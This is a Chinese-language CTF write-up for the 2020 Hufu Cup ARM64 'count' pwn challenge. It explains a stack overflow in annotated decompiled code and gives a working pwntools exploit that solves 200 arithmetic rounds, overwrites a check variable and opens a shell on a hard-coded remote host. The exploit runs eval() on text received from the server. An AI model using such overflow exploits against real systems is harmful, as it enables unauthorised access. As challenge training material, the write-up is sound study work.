
2020 i-春秋 虎符杯 pwn 题解writeup


上个周末打了两场比赛，记录一下虎符杯和西工大校赛的 pwn 题解，这篇用来记录虎符杯的。
虎符杯的 pwn 最后出了两道题。

count

这道题是最简单的一个，属于 ARM pwn 的入门题。
漏洞点在下面这个函数：

// Decompiled (IDA-style) main game loop of the "count" challenge: the player
// must answer 200 arithmetic rounds, then a second read() into v7 is allowed
// to run past v7's slot and reach v8 (see the stack offsets in the comments).
__int64 sub_400990()
{
unsigned int v0; // w0
__int64 v1; // x0
__int64 v2; // x0
__int64 v3; // x0
__int64 v4; // x0
__int64 v6; // [xsp+10h] [xbp+10h]  -- answer buffer; read() writes up to 20 bytes here (typed as 8 bytes by the decompiler)

__int64 v7; // [xsp+78h] [xbp+78h]  -- second input buffer; v8 lies 0xDC - 0x78 = 0x64 (100) bytes after it
int v8; // [xsp+DCh] [xbp+DCh]      -- "unlock" value, compared with the magic constant after the loop


int v9; // [xsp+E0h] [xbp+E0h]   -- player's parsed answer
int v10; // [xsp+E4h] [xbp+E4h]  -- expected answer
int v11; // [xsp+E8h] [xbp+E8h]  -- 4th operand
int v12; // [xsp+ECh] [xbp+ECh]  -- 3rd operand
int v13; // [xsp+F0h] [xbp+F0h]  -- 2nd operand
int v14; // [xsp+F4h] [xbp+F4h]  -- 1st operand
unsigned int v15; // [xsp+F8h] [xbp+F8h]  -- time(0) value used as the PRNG seed
int v16; // [xsp+FCh] [xbp+FCh]  -- round counter

sub_400940(); // setup routine; its body is not shown here (presumably stdio/buffering setup -- unverified)
v16 = 0;
do
{
// Each round reseeds the PRNG with the current second and draws four
// operands in [0, 100). rand() appears to take the previous x0 as an
// argument only because the decompiler reuses the register; it is not a
// real parameter.
v0 = time(0LL);
v15 = v0;
v1 = srand(v0);
v2 = (unsigned int)((signed int)rand(v1) % 100);
v14 = v2;
v3 = (unsigned int)((signed int)rand(v2) % 100);
v13 = v3;
v4 = (unsigned int)((signed int)rand(v3) % 100);
v12 = v4;
v11 = (signed int)rand(v4) % 100;
printf("there have 200 levels ~");
printf("Math: %d * %d + %d + %d = ???"); // the %d arguments are not recovered by the decompiler (varargs); the binary presumably prints v14, v13, v12, v11
printf("input answer:");
read(0LL, &v6, 20LL); // 20 bytes into a slot typed as 8 bytes; v6 is presumably a larger stack buffer than its declaration suggests
v10 = v14 * v13 + v12 + v11;
v9 = strtol(&v6, 0LL, 10LL);
if ( v10 != v9 )
{
puts("wrong ");
exit(0LL); // a single wrong answer terminates the process
}
puts("good !");
++v16;
}
while ( v16 <= 199 ); // 200 rounds (v16 = 0..199)
v8 = 256;
// Missing bounds check: up to 0x6E (110) bytes are read into v7, but v8 is
// only 0x64 (100) bytes further up the frame, so the tail of this input
// overwrites v8 (and the four bytes after it). Limiting the read to v7's
// size, or placing the flag variable before the buffer, would close this.
read(0LL, &v7, 0x6ELL);
if ( v8 == 304305682 ) // magic value; v8 is set to 256 above, so this is reachable only via the overflow
{
puts("get it ~");
sub_400920(); // the write-up refers to this as the backdoor function; its body is not shown
}
return 0LL;
}

v7 存在溢出：v7 位于 xbp+78h，v8 位于 xbp+DCh，两者相距 0x64（100）字节，而 read 允许读入 0x6E（110）字节，因此可以覆盖 v8 的值，从而进入后门函数 sub_400920，get shell。

from pwn import *

context.log_level = "debug"
context.arch = 'arm64'


p = remote("39.97.210.182",40285)

for i in range(200):
p.recvuntil("there have 200 levels ~Math: ")
data = p.recvuntil("=",True)
ans = eval(data)
p.sendline(str(ans))

payload='A'*100+p64(304305682)
p.send(payload)
p.interactive()
